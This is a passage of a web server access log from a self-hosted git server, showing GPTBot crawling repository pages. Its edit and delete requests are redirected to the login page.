"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:17:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 10756] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject" [Client 74.7.227.38] [Length 9810] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" -[17/Feb/2026:17:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11086] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:17:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 11757] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" -[17/Feb/2026:17:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12008] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode" -[17/Feb/2026:17:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12007] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode" -[17/Feb/2026:17:28:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:28:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 15544] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:28:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:28:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/assets_data.csv" -[17/Feb/2026:17:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&state=all&type=all" -[17/Feb/2026:17:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:17:28:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 9814] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 11096] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 459] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:28:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 21087] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 9846] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11282] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:28:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:17:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11282] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 6062] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:29:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:29:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11096] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 29627] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:17:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 24501] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:17:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX" [Client 74.7.227.38] [Length 54691] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11114] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec?display=source" [Client 74.7.227.38] [Length 12456] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12413] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr 